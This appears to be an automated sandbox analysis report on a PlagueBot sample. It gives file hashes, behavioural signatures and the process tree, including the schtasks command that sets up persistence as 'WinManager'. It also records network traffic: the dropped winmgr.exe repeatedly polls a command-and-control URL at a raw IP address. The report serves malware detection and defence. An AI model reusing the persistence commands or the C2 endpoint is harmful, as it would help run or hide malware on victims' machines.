Analysis

  • max time kernel
    109s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-10-2022 06:02

General

  • Target

    b03ccade490854df220914c4430967e2.exe

  • Size

    967KB

  • MD5

    b03ccade490854df220914c4430967e2

  • SHA1

    1911a59e8c4b427d3fbc8fc9c794886bd2d81305

  • SHA256

    81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

  • SHA512

    0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

  • SSDEEP

    24576:xNxsglIPAtgV+rnEQBg2AdqgwGd9OCPltP0gxkR3dCqJO5VxQ75Sf1:57uKrnEQi2Ad/wQPLP0gx1qt5Sf1

Score
10/10

Malware Config

Signatures

  • PlagueBot

    PlagueBot is an open source Bot written in Pascal.

  • PlagueBot Executable (4 IoCs)
  • Executes dropped EXE (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) (1 TTP, 1 IoC)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory (9 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\b03ccade490854df220914c4430967e2.exe
    "C:\Users\Admin\AppData\Local\Temp\b03ccade490854df220914c4430967e2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4656
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /TN "WinManager" /XML "C:\Users\Admin\AppData\Local\Temp\NewTask.xml"
      2⤵
      • Creates scheduled task(s)
      PID:1164
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /Query /FO "LIST" /TN "WinManager"
      2⤵
      PID:5036
    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      "C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe" /wait
      2⤵
      • Executes dropped EXE
      PID:2912
  • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
    C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
    1⤵
    • Executes dropped EXE
    PID:4560
  • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
    C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
    1⤵
    • Executes dropped EXE
    PID:816

    Network

    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:19 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      18 further GET requests from winmgr.exe to the same URL on 146.70.143.176:80 follow at roughly 5-second intervals, with response Dates running from Wed, 19 Oct 2022 06:02:24 GMT to Wed, 19 Oct 2022 06:03:52 GMT. Request and response headers are identical to the entry above except for the Date and the Keep-Alive max counter, which counts down from 99 to 82; every response is HTTP/1.1 200 OK with Content-Length: 40.
    • 146.70.143.176:80
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      http
      winmgr.exe
      6.3kB
      6.5kB
      40
      22

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      The same request/response pair (GET to this URL, answered with 200) is recorded 19 times in total on this connection.
    • 93.184.221.240:80
      322 B
      7
    • 104.80.225.205:443
      322 B
      7
    • 51.132.193.104:443
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\NewTask.xml

      Filesize

      1KB

      MD5

      76cdea2a5eb493f5a69b6d4ec0d6c6a5

      SHA1

      822eb372a69c75d593b12ca6af0ebdecb4ca643d

      SHA256

      472b9a23f16e583189b50e59fc219ed06488b3be38f116bd02c54b34f88ce5a6

      SHA512

      19df57937d0b250b38c076c8b55f03a76252d90c5936f3ac416843a46a9ff5edeaad2a295bd9f06e1740d7fc2427f3a58092113618db03658601ad0398b834e8

    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

      Filesize

      967KB

      MD5

      b63bb68654e7be72058398809d6c4754

      SHA1

      4a7b43488029a2d4c960c9ee4431b99c8640a4b0

      SHA256

      8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

      SHA512

      c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

